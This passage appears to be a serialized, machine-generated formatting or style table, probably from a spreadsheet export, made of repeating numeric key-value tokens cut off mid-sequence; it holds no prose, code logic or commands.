;1|2:2|3:1016|15:153|4:15;n;4|9:428|10:1017;p;1|1:421|2:2|5:460|14:461|3:1018|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1019|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1020|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1021|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1022|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1023|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1024|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:1025|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5'
- ..':424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1026|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1027|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1028|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1029|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:1030|15:996|4:15;n;4|9:428|10:1031;p;1|1:421|2:2|3:1032|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1033|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1034|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1035|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:1036|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1037|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1038|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1039|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1040|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1041|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:1042|15:21|4:467;n;4|9:428|10:1043;p;1|1:421|2:2|5:19|3:1044|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1045|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1046|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:1047|15:153|4:427;n;4|9:428|10:429;p;1|1:421|2:2|5:'
- ..'19|3:1048|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1049|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1050|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1051|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1052|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1053|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1054|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1055|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1056|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1057|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1058|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1059|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1060|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1061|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1062|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:1063|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1064|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1065|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1066|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3'
- ..':1067|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1068|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1069|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1070|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1071|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1072|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1073|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1074|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1075|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1076|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1077|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1078|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1079|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1080|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1081|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1082|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1083|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1084|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1085|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450'
- ..';p;1|1:421|2:2|5:19|3:1086|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1087|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1088|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1089|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1090|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1091|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1092|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1093|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1094|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1095|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1096|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1097|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1098|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1099|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1100|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1101|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1102|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1103|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1104|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:'
- ..'421|2:2|5:19|3:1105|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1106|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1107|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1108|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1109|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1110|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1111|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|3:1112|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1113|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1114|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1115|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1116|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1117|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1118|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1119|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1120|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1121|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1122|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1123|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3'
- ..':1124|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1125|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1126|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1127|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1128|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1129|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1130|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:1131|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1132|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1133|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1134|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1135|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1136|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1137|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1138|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1139|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1140|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1141|15:325|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1142|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1143|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7'
- ..':8|8:425|5:424|5:424;p;1|1:421|2:2|3:1144|15:325|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1145|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1146|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1147|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1148|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1149|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1150|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1151|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1152|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1154|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1155|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1156|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1157|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:1158|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:1159|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1160|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1161|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1162|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2'
- ..'|5:19|3:1163|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1164|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1165|15:21|4:584|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1166|15:21|4:608|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1167|15:325|4:582|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1168|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1169|15:325|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1170|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1171|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1172|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1173|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:1174|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1175|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1176|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1177|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1178|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1179|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1180|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1181|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:1182|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7'
- ..'|1:450;p;1|1:421|2:2|5:19|3:1183|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:1184|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1185|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1186|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1187|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1188|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1189|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1190|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1191|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1192|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1193|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1194|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1195|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1196|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1197|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1198|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1199|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1200|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1201|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1202|1'
- ..'5:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1203|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1204|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1205|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1206|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1207|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1208|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1209|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1210|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1211|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1212|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1213|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1214|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1215|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1216|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1217|15:1218|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1219|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1220|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1221|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:42